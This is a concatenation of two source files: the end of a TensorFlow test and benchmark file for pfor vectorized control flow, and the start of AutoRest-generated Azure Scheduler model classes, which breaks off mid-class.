class Benchmarks(test.Benchmark):
def _run(self, targets, iters, name=None):
def _done(t):
# Note that we don't use tf.control_dependencies since that will not make
# sure that the computation on GPU has actually finished. So we fetch the
# first element of the output, and assume that this will not be called on
# empty tensors.
return array_ops.gather(array_ops.reshape(t, [-1]), 0)
targets = [_done(x) for x in nest.flatten(targets)]
sess = session.Session()
with sess:
init = variables.global_variables_initializer()
sess.run(init)
run_fn = sess.make_callable(targets)
run_fn() # Warm up
begin = time.time()
for _ in range(iters):
run_fn()
end = time.time()
avg_time_ms = 1000 * (end - begin) / iters
self.report_benchmark(iters=iters, wall_time=avg_time_ms, name=name)
return avg_time_ms
def benchmark_sess_run_overhead(self):
with ops.Graph().as_default():
x = constant_op.constant(1.0)
self._run(x, 10000, name="session_run_overhead")
def benchmark_add(self):
with ops.Graph().as_default():
n = 256
params = 1000
x = random_ops.random_normal([n, params])
y = random_ops.random_normal([n, params])
def loop_fn(i):
x_i = array_ops.gather(x, i)
y_i = array_ops.gather(y, i)
return x_i + y_i
pfor_outputs = pfor_control_flow_ops.pfor(loop_fn, n)
while_outputs = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, n)
manual = x + y
self._run(manual, 1000, name="manual_add")
self._run(pfor_outputs, 1000, name="pfor_add")
self._run(while_outputs, 100, name="while_add")
def benchmark_matmul(self):
with ops.Graph().as_default():
n = 1024
params = 1000
x = random_ops.random_normal([n, params])
y = random_ops.random_normal([params, params])
def loop_fn(i):
x_i = array_ops.expand_dims(array_ops.gather(x, i), 0)
return math_ops.matmul(x_i, y)
pfor_outputs = pfor_control_flow_ops.pfor(loop_fn, n)
while_outputs = pfor_control_flow_ops.for_loop(loop_fn, dtypes.float32, n)
manual = math_ops.matmul(x, y)
self._run(manual, 1000, name="manual_matmul")
self._run(pfor_outputs, 1000, name="pfor_matmul")
self._run(while_outputs, 100, name="while_matmul")
def benchmark_map_fn(self):
with ops.Graph().as_default():
b = 256
params = 1000
inp = random_ops.random_normal((b, params))
fn = lambda x: x * x
def pfor_map_fn(f, x):
return pfor_control_flow_ops.pfor(lambda i: f(array_ops.gather(x, i)),
array_ops.shape(x)[0])
map_output = map_fn.map_fn(fn, inp)
pfor_output = pfor_map_fn(fn, inp)
self._run(map_output, 100, name="tf_map_fn")
self._run(pfor_output, 100, name="pfor_map_fn")
def benchmark_basic_while(self):
with ops.Graph().as_default():
def loop_fn(i):
_, s = control_flow_ops.while_loop(lambda t, x: t < i, lambda t, x:
(t + 1, x + i), [0, 0])
return s
iters = 50
pfor_output = pfor_control_flow_ops.pfor(loop_fn, iters)
for_loop_output = pfor_control_flow_ops.for_loop(loop_fn, dtypes.int32,
iters)
self._run(pfor_output, 100, name="pfor_basic")
self._run(for_loop_output, 100, name="for_loop_basic")
def benchmark_dynamic_rnn(self):
with ops.Graph().as_default():
pfor_outputs, tf_outputs = create_dynamic_lstm(rnn_cell.BasicRNNCell, 128,
512, 16)
self._run(pfor_outputs, 100, name="pfor_rnn")
self._run(tf_outputs, 100, name="tf_rnn")
def benchmark_reduction(self):
n = 1024
with ops.Graph().as_default():
x = random_ops.random_uniform([n, n])
w = random_ops.random_uniform([n, n])
def loop_fn(i, pfor_config):
x_i = array_ops.gather(x, i)
return math_ops.reduce_sum(
math_ops.matmul(pfor_config.reduce_concat(x_i), w))
# Note that output_reduction will be tiled, so there may be some minor
# overheads compared to output_no_reduction.
output_reduction = pfor_control_flow_ops.pfor(loop_fn, n)
output_no_reduction = math_ops.reduce_sum(math_ops.matmul(x, w))
# Benchmark to test that reduction does not add overhead and its output is
# treated as loop invariant.
self._run(output_reduction, 30, name="matmul_reduction")
self._run(output_no_reduction, 30, name="matmul_no_reduction")
class SparseTest(PForTestCase):
@test_util.run_v1_only("b/122612051")
def test_var_loop_len(self):
num_iters = array_ops.placeholder(dtypes.int32)
def loop_fn(_):
return sparse_tensor.SparseTensor([[0], [1], [2]], [4, 5, 6],
[3]) # [0, 2, 0]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
with self.cached_session() as sess:
sess.run(pfor, feed_dict={num_iters: 3})
@test_util.run_v1_only("b/122612051")
def test_sparse_result_none_stacked(self):
num_iters = 10
def loop_fn(_):
return sparse_tensor.SparseTensor([[0], [1], [2]], [4, 5, 6],
[3]) # [0, 2, 0]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
indices = [[i, j] for i in range(num_iters) for j in range(3)]
values = [4, 5, 6] * num_iters
dense_shapes = [num_iters, 3]
# Expected result: [[4, 5, 6], [4, 5, 6], [4, 5, 6], ...]
manual = sparse_tensor.SparseTensor(indices, values, dense_shapes)
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_all_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
indices = array_ops.expand_dims(i, 0)
return sparse_tensor.SparseTensor(indices, i, i + 1) # [0, ..., 0, i]
# Expected result: [[0], [0, 1], [0, 0, 2], [0, 0, 0, 3], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, i] for i in range(num_iters)],
list(range(num_iters)),
(num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_indices_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
indices = array_ops.expand_dims(i, 0)
return sparse_tensor.SparseTensor(indices, [1], [num_iters])
# Expected result: identity matrix size num_iters * num_iters
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, i] for i in range(num_iters)],
[1] * num_iters, (num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_values_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
return sparse_tensor.SparseTensor([[0]], i, [num_iters]) # [i, 0, ..., 0]
# Expected result: [[1, 0, ...], [2, 0, ...], [3, 0, ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0] for i in range(num_iters)],
list(range(num_iters)),
(num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_shapes_stacked(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i, dtypes.int64), 0)
return sparse_tensor.SparseTensor([[0]], [1], i + 1) # [1, 0, ..., 0]
# Expected result: [[1, 0, 0, ...], [1, 0, 0, ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0] for i in range(num_iters)],
[1] * num_iters, (num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
@test_util.run_v1_only("b/122612051")
def test_sparse_result_shapes_stacked_2D(self):
num_iters = 10
def loop_fn(i):
i = array_ops.expand_dims(math_ops.cast(i + 1, dtypes.int64), 0)
shape = array_ops.concat([i, i], 0)
return sparse_tensor.SparseTensor([[0, 0]], [1], shape) # [1, 0, ..., 0]
# Expected result: [[[1, 0, ...], [0, ..., 0], [0, ..., 0], ...], ...]
pfor = pfor_control_flow_ops.pfor(loop_fn, num_iters)
manual = sparse_tensor.SparseTensor([[i, 0, 0] for i in range(num_iters)],
[1] * num_iters,
(num_iters, num_iters, num_iters))
self.run_and_assert_equal(pfor, manual)
class ParsingTest(PForTestCase):
def test_decode_csv(self):
csv_tensor = constant_op.constant([["1:2:3"], ["::"], ["7:8:9"]])
kwargs = {"record_defaults": [[10], [20], [30]], "field_delim": ":"}
def loop_fn(i):
line = array_ops.gather(csv_tensor, i)
return parsing_ops.decode_csv(line, **kwargs)
self._test_loop_fn(loop_fn, iters=3)
@test_util.run_v1_only("b/122612051")
def test_parse_single_example(self):
def _int64_feature(*values):
return feature_pb2.Feature(int64_list=feature_pb2.Int64List(value=values))
def _bytes_feature(*values):
return feature_pb2.Feature(
bytes_list=feature_pb2.BytesList(
value=[v.encode("utf-8") for v in values]))
examples = constant_op.constant([
example_pb2.Example(
features=feature_pb2.Features(
feature={
"dense_int": _int64_feature(i),
"dense_str": _bytes_feature(str(i)),
"sparse_int": _int64_feature(i, i * 2, i * 4, i * 8),
"sparse_str": _bytes_feature(*["abc"] * i)
})).SerializeToString() for i in range(10)
])
features = {
"dense_int": parsing_ops.FixedLenFeature((), dtypes.int64, 0),
"dense_str": parsing_ops.FixedLenFeature((), dtypes.string, ""),
"sparse_int": parsing_ops.VarLenFeature(dtypes.int64),
"sparse_str": parsing_ops.VarLenFeature(dtypes.string),
}
def loop_fn(i):
example_proto = array_ops.gather(examples, i)
f = parsing_ops.parse_single_example(example_proto, features)
return f
pfor = pfor_control_flow_ops.pfor(loop_fn, iters=10)
manual = parsing_ops.parse_example(examples, features)
self.run_and_assert_equal(pfor, manual)
class PartitionedCallTest(PForTestCase):
def test_simple(self):
@def_function.function
def f(x):
return math_ops.square(x) + 1
z = random_ops.random_uniform([4])
def loop_fn(i):
return f(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_nested_calls(self):
@def_function.function
def inner(x):
return math_ops.square(x)
@def_function.function
def outer(y):
return math_ops.reduce_sum(inner(y)) + 2
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
return outer(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_nested_definition(self):
@def_function.function
def outer(y):
@def_function.function
def inner(x):
return math_ops.square(x) + 1
return math_ops.reduce_sum(inner(y)) + 2
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
return outer(array_ops.gather(z, i))
self._test_loop_fn(loop_fn, 4)
def test_gradients(self):
@def_function.function
def f(x):
return math_ops.square(x) + 1
z = random_ops.random_uniform([4, 2])
def loop_fn(i):
z_i = array_ops.gather(z, i)
with backprop.GradientTape() as g:
g.watch(z_i)
out = f(z_i)
return out, g.gradient(out, z_i)
self._test_loop_fn(loop_fn, 4)
def test_stateful_with_gradients(self):
z = random_ops.random_uniform([4, 2])
v = variables.Variable(z[0])
@def_function.function
def f(x):
return math_ops.square(x) + v + 1
def loop_fn(i):
z_i = array_ops.gather(z, i)
with backprop.GradientTape() as g:
g.watch(z_i)
out = f(z_i)
return out, g.gradient(out, z_i)
self._test_loop_fn(loop_fn, 4)
class SpectralTest(PForTestCase, parameterized.TestCase):
@parameterized.parameters(
(fft_ops.fft,),
(fft_ops.fft2d,),
(fft_ops.fft3d,),
(fft_ops.ifft,),
(fft_ops.ifft2d,),
(fft_ops.ifft3d,),
)
def test_fft(self, op_func):
shape = [2, 3, 4, 3, 4]
x = np.random.uniform(size=shape) + 1j * np.random.uniform(size=shape)
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(fft_ops.rfft,),
(fft_ops.rfft2d,),
(fft_ops.rfft3d,),
)
def test_rfft(self, op_func):
for dtype in (dtypes.float32, dtypes.float64):
x = random_ops.random_uniform([2, 3, 4, 3, 4], dtype=dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
@parameterized.parameters(
(fft_ops.irfft,),
(fft_ops.irfft2d,),
(fft_ops.irfft3d,),
)
def test_irfft(self, op_func):
if config.list_physical_devices("GPU"):
# TODO(b/149957923): The test is flaky
self.skipTest("b/149957923: irfft vectorization flaky")
for dtype in (dtypes.complex64, dtypes.complex128):
shape = [2, 3, 4, 3, 4]
x = np.random.uniform(size=shape) + 1j * np.random.uniform(size=shape)
x = math_ops.cast(x, dtype=dtype)
# pylint: disable=cell-var-from-loop
def loop_fn(i):
x_i = array_ops.gather(x, i)
return op_func(x_i)
# pylint: enable=cell-var-from-loop
self._test_loop_fn(loop_fn, 2)
class VariableTest(PForTestCase):
def test_create_variable_once(self):
x = array_ops.ones(shape=(3, 2, 2), dtype=dtypes.float32)
y = array_ops.ones(shape=(2, 3), dtype=dtypes.float32)
a_var = []
def f(z):
if not a_var:
a_var.append(variables.Variable(lambda: y, name="a"))
return math_ops.matmul(z, a_var[0] / 16)
pfor_control_flow_ops.vectorized_map(f, x)
@test_util.run_v2_only
def test_create_variable_repeated(self):
x = array_ops.ones(shape=(3, 2, 2), dtype=dtypes.float32)
y = array_ops.ones(shape=(2, 3), dtype=dtypes.float32)
def f(z):
a_var = variables.Variable(lambda: y, name="a") / 4
return math_ops.matmul(z, a_var / 16)
# Note that this error is only raised under v2 behavior.
with self.assertRaisesRegex(
ValueError,
"tf.function-decorated function tried to create variables on non-first"
):
pfor_control_flow_ops.vectorized_map(f, x)
@test_util.run_all_in_graph_and_eager_modes
def test_variable_shape(self):
v = resource_variable_ops.ResourceVariable([1, 2])
def loop_fn(_):
return resource_variable_ops.variable_shape(v.handle)
self._test_loop_fn(loop_fn, 2)
if __name__ == "__main__":
test.main()
| karllessard/tensorflow | tensorflow/python/ops/parallel_for/control_flow_ops_test.py | Python | apache-2.0 | 74,341 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class HttpAuthentication(msrest.serialization.Model):
"""HttpAuthentication.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: OAuthAuthentication, BasicAuthentication, ClientCertAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. Gets or sets the HTTP authentication type.Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
}
_subtype_map = {
'type': {'ActiveDirectoryOAuth': 'OAuthAuthentication', 'Basic': 'BasicAuthentication', 'ClientCertificate': 'ClientCertAuthentication'}
}
def __init__(
self,
**kwargs
):
super(HttpAuthentication, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class BasicAuthentication(HttpAuthentication):
"""BasicAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. Gets or sets the HTTP authentication type.Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param username: Gets or sets the username.
:type username: str
:param password: Gets or sets the password, return value will always be empty.
:type password: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(BasicAuthentication, self).__init__(**kwargs)
self.type = 'Basic' # type: str
self.username = kwargs.get('username', None)
self.password = kwargs.get('password', None)
class ClientCertAuthentication(HttpAuthentication):
"""ClientCertAuthentication.
All required parameters must be populated in order to send to Azure.
:param type: Required. Gets or sets the HTTP authentication type.Constant filled by server.
Possible values include: "NotSpecified", "ClientCertificate", "ActiveDirectoryOAuth", "Basic".
:type type: str or ~azure.mgmt.scheduler.models.HttpAuthenticationType
:param password: Gets or sets the certificate password, return value will always be empty.
:type password: str
:param pfx: Gets or sets the pfx certificate. Accepts certification in base64 encoding, return
value will always be empty.
:type pfx: str
:param certificate_thumbprint: Gets or sets the certificate thumbprint.
:type certificate_thumbprint: str
:param certificate_expiration_date: Gets or sets the certificate expiration date.
:type certificate_expiration_date: ~datetime.datetime
:param certificate_subject_name: Gets or sets the certificate subject name.
:type certificate_subject_name: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
'pfx': {'key': 'pfx', 'type': 'str'},
'certificate_thumbprint': {'key': 'certificateThumbprint', 'type': 'str'},
'certificate_expiration_date': {'key': 'certificateExpirationDate', 'type': 'iso-8601'},
'certificate_subject_name': {'key': 'certificateSubjectName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ClientCertAuthentication, self).__init__(**kwargs)
self.type = 'ClientCertificate' # type: str
self.password = kwargs.get('password', None)
self.pfx = kwargs.get('pfx', None)
self.certificate_thumbprint = kwargs.get('certificate_thumbprint', None)
self.certificate_expiration_date = kwargs.get('certificate_expiration_date', None)
self.certificate_subject_name = kwargs.get('certificate_subject_name', None)
class HttpRequest(msrest.serialization.Model):
"""HttpRequest.
:param authentication: Gets or sets the authentication method of the request.
:type authentication: ~azure.mgmt.scheduler.models.HttpAuthentication
:param uri: Gets or sets the URI of the request.
:type uri: str
:param method: Gets or sets the method of the request.
:type method: str
:param body: Gets or sets the request body.
:type body: str
:param headers: Gets or sets the headers.
:type headers: dict[str, str]
"""
_attribute_map = {
'authentication': {'key': 'authentication', 'type': 'HttpAuthentication'},
'uri': {'key': 'uri', 'type': 'str'},
'method': {'key': 'method', 'type': 'str'},
'body': {'key': 'body', 'type': 'str'},
'headers': {'key': 'headers', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(HttpRequest, self).__init__(**kwargs)
self.authentication = kwargs.get('authentication', None)
self.uri = kwargs.get('uri', None)
self.method = kwargs.get('method', None)
self.body = kwargs.get('body', None)
self.headers = kwargs.get('headers', None)
class JobAction(msrest.serialization.Model):
"""JobAction.
:param type: Gets or sets the job action type. Possible values include: "Http", "Https",
"StorageQueue", "ServiceBusQueue", "ServiceBusTopic".
:type type: str or ~azure.mgmt.scheduler.models.JobActionType
:param request: Gets or sets the http requests.
:type request: ~azure.mgmt.scheduler.models.HttpRequest
:param queue_message: Gets or sets the storage queue message.
:type queue_message: ~azure.mgmt.scheduler.models.StorageQueueMessage
:param service_bus_queue_message: Gets or sets the service bus queue message.
:type service_bus_queue_message: ~azure.mgmt.scheduler.models.ServiceBusQueueMessage
:param service_bus_topic_message: Gets or sets the service bus topic message.
:type service_bus_topic_message: ~azure.mgmt.scheduler.models.ServiceBusTopicMessage
:param retry_policy: Gets or sets the retry policy.
:type retry_policy: ~azure.mgmt.scheduler.models.RetryPolicy
:param error_action: Gets or sets the error action.
:type error_action: ~azure.mgmt.scheduler.models.JobErrorAction
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'request': {'key': 'request', 'type': 'HttpRequest'},
'queue_message': {'key': 'queueMessage', 'type': 'StorageQueueMessage'},
'service_bus_queue_message': {'key': 'serviceBusQueueMessage', 'type': 'ServiceBusQueueMessage'},
'service_bus_topic_message': {'key': 'serviceBusTopicMessage', 'type': 'ServiceBusTopicMessage'},
'retry_policy': {'key': 'retryPolicy', 'type': 'RetryPolicy'},
'error_action': {'key': 'errorAction', 'type': 'JobErrorAction'},
}
def __init__(
self,
**kwargs
):
super(JobAction, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.request = kwargs.get('request', None)
self.queue_message = kwargs.get('queue_message', None)
self.service_bus_queue_message = kwargs.get('service_bus_queue_message', None)
self.service_bus_topic_message = kwargs.get('service_bus_topic_message', None)
self.retry_policy = kwargs.get('retry_policy', None)
self.error_action = kwargs.get('error_action', None)
class JobCollectionDefinition(msrest.serialization.Model):
"""JobCollectionDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job collection resource identifier.
:vartype id: str
:ivar type: Gets the job collection resource type.
:vartype type: str
:param name: Gets or sets the job collection resource name.
:type name: str
:param location: Gets or sets the storage account location.
:type location: str
:param tags: A set of tags. Gets or sets the tags.
:type tags: dict[str, str]
:param properties: Gets or sets the job collection properties.
:type properties: ~azure.mgmt.scheduler.models.JobCollectionProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'JobCollectionProperties'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = kwargs.get('name', None)
self.location = kwargs.get('location', None)
self.tags = kwargs.get('tags', None)
self.properties = kwargs.get('properties', None)
class JobCollectionListResult(msrest.serialization.Model):
"""JobCollectionListResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: Gets the job collections.
:vartype value: list[~azure.mgmt.scheduler.models.JobCollectionDefinition]
:param next_link: Gets or sets the URL to get the next set of job collections.
:type next_link: str
"""
_validation = {
'value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[JobCollectionDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionListResult, self).__init__(**kwargs)
self.value = None
self.next_link = kwargs.get('next_link', None)
class JobCollectionProperties(msrest.serialization.Model):
"""JobCollectionProperties.
:param sku: Gets or sets the SKU.
:type sku: ~azure.mgmt.scheduler.models.Sku
:param state: Gets or sets the state. Possible values include: "Enabled", "Disabled",
"Suspended", "Deleted".
:type state: str or ~azure.mgmt.scheduler.models.JobCollectionState
:param quota: Gets or sets the job collection quota.
:type quota: ~azure.mgmt.scheduler.models.JobCollectionQuota
"""
_attribute_map = {
'sku': {'key': 'sku', 'type': 'Sku'},
'state': {'key': 'state', 'type': 'str'},
'quota': {'key': 'quota', 'type': 'JobCollectionQuota'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionProperties, self).__init__(**kwargs)
self.sku = kwargs.get('sku', None)
self.state = kwargs.get('state', None)
self.quota = kwargs.get('quota', None)
class JobCollectionQuota(msrest.serialization.Model):
"""JobCollectionQuota.
:param max_job_count: Gets or set the maximum job count.
:type max_job_count: int
:param max_job_occurrence: Gets or sets the maximum job occurrence.
:type max_job_occurrence: int
:param max_recurrence: Gets or set the maximum recurrence.
:type max_recurrence: ~azure.mgmt.scheduler.models.JobMaxRecurrence
"""
_attribute_map = {
'max_job_count': {'key': 'maxJobCount', 'type': 'int'},
'max_job_occurrence': {'key': 'maxJobOccurrence', 'type': 'int'},
'max_recurrence': {'key': 'maxRecurrence', 'type': 'JobMaxRecurrence'},
}
def __init__(
self,
**kwargs
):
super(JobCollectionQuota, self).__init__(**kwargs)
self.max_job_count = kwargs.get('max_job_count', None)
self.max_job_occurrence = kwargs.get('max_job_occurrence', None)
self.max_recurrence = kwargs.get('max_recurrence', None)
class JobDefinition(msrest.serialization.Model):
"""JobDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job resource identifier.
:vartype id: str
:ivar type: Gets the job resource type.
:vartype type: str
:ivar name: Gets the job resource name.
:vartype name: str
:param properties: Gets or sets the job properties.
:type properties: ~azure.mgmt.scheduler.models.JobProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'JobProperties'},
}
def __init__(
self,
**kwargs
):
super(JobDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.properties = kwargs.get('properties', None)
class JobErrorAction(msrest.serialization.Model):
"""JobErrorAction.
:param type: Gets or sets the job error action type. Possible values include: "Http", "Https",
"StorageQueue", "ServiceBusQueue", "ServiceBusTopic".
:type type: str or ~azure.mgmt.scheduler.models.JobActionType
:param request: Gets or sets the http requests.
:type request: ~azure.mgmt.scheduler.models.HttpRequest
:param queue_message: Gets or sets the storage queue message.
:type queue_message: ~azure.mgmt.scheduler.models.StorageQueueMessage
:param service_bus_queue_message: Gets or sets the service bus queue message.
:type service_bus_queue_message: ~azure.mgmt.scheduler.models.ServiceBusQueueMessage
:param service_bus_topic_message: Gets or sets the service bus topic message.
:type service_bus_topic_message: ~azure.mgmt.scheduler.models.ServiceBusTopicMessage
:param retry_policy: Gets or sets the retry policy.
:type retry_policy: ~azure.mgmt.scheduler.models.RetryPolicy
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'request': {'key': 'request', 'type': 'HttpRequest'},
'queue_message': {'key': 'queueMessage', 'type': 'StorageQueueMessage'},
'service_bus_queue_message': {'key': 'serviceBusQueueMessage', 'type': 'ServiceBusQueueMessage'},
'service_bus_topic_message': {'key': 'serviceBusTopicMessage', 'type': 'ServiceBusTopicMessage'},
'retry_policy': {'key': 'retryPolicy', 'type': 'RetryPolicy'},
}
def __init__(
self,
**kwargs
):
super(JobErrorAction, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.request = kwargs.get('request', None)
self.queue_message = kwargs.get('queue_message', None)
self.service_bus_queue_message = kwargs.get('service_bus_queue_message', None)
self.service_bus_topic_message = kwargs.get('service_bus_topic_message', None)
self.retry_policy = kwargs.get('retry_policy', None)
class JobHistoryDefinition(msrest.serialization.Model):
"""JobHistoryDefinition.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Gets the job history identifier.
:vartype id: str
:ivar type: Gets the job history resource type.
:vartype type: str
:ivar name: Gets the job history name.
:vartype name: str
:ivar properties: Gets or sets the job history properties.
:vartype properties: ~azure.mgmt.scheduler.models.JobHistoryDefinitionProperties
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'JobHistoryDefinitionProperties'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryDefinition, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.properties = None
class JobHistoryDefinitionProperties(msrest.serialization.Model):
"""JobHistoryDefinitionProperties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar start_time: Gets the start time for this job.
:vartype start_time: ~datetime.datetime
:ivar end_time: Gets the end time for this job.
:vartype end_time: ~datetime.datetime
:ivar expected_execution_time: Gets the expected execution time for this job.
:vartype expected_execution_time: ~datetime.datetime
:ivar action_name: Gets the job history action name. Possible values include: "MainAction",
"ErrorAction".
:vartype action_name: str or ~azure.mgmt.scheduler.models.JobHistoryActionName
:ivar status: Gets the job history status. Possible values include: "Completed", "Failed",
"Postponed".
:vartype status: str or ~azure.mgmt.scheduler.models.JobExecutionStatus
:ivar message: Gets the message for the job history.
:vartype message: str
:ivar retry_count: Gets the retry count for job.
:vartype retry_count: int
:ivar repeat_count: Gets the repeat count for the job.
:vartype repeat_count: int
"""
_validation = {
'start_time': {'readonly': True},
'end_time': {'readonly': True},
'expected_execution_time': {'readonly': True},
'action_name': {'readonly': True},
'status': {'readonly': True},
'message': {'readonly': True},
'retry_count': {'readonly': True},
'repeat_count': {'readonly': True},
}
_attribute_map = {
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'expected_execution_time': {'key': 'expectedExecutionTime', 'type': 'iso-8601'},
'action_name': {'key': 'actionName', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'retry_count': {'key': 'retryCount', 'type': 'int'},
'repeat_count': {'key': 'repeatCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryDefinitionProperties, self).__init__(**kwargs)
self.start_time = None
self.end_time = None
self.expected_execution_time = None
self.action_name = None
self.status = None
self.message = None
self.retry_count = None
self.repeat_count = None
class JobHistoryFilter(msrest.serialization.Model):
"""JobHistoryFilter.
:param status: Gets or sets the job execution status. Possible values include: "Completed",
"Failed", "Postponed".
:type status: str or ~azure.mgmt.scheduler.models.JobExecutionStatus
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryFilter, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
class JobHistoryListResult(msrest.serialization.Model):
"""JobHistoryListResult.
:param value: Gets or sets the job histories under job.
:type value: list[~azure.mgmt.scheduler.models.JobHistoryDefinition]
:param next_link: Gets or sets the URL to get the next set of job histories.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[JobHistoryDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobHistoryListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class JobListResult(msrest.serialization.Model):
"""JobListResult.
:param value: Gets or sets all jobs under job collection.
:type value: list[~azure.mgmt.scheduler.models.JobDefinition]
:param next_link: Gets or sets the URL to get the next set of jobs.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[JobDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(JobListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class JobMaxRecurrence(msrest.serialization.Model):
"""JobMaxRecurrence.
:param frequency: Gets or sets the frequency of recurrence (second, minute, hour, day, week,
month). Possible values include: "Minute", "Hour", "Day", "Week", "Month".
:type frequency: str or ~azure.mgmt.scheduler.models.RecurrenceFrequency
:param interval: Gets or sets the interval between retries.
:type interval: int
"""
_attribute_map = {
'frequency': {'key': 'frequency', 'type': 'str'},
'interval': {'key': 'interval', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(JobMaxRecurrence, self).__init__(**kwargs)
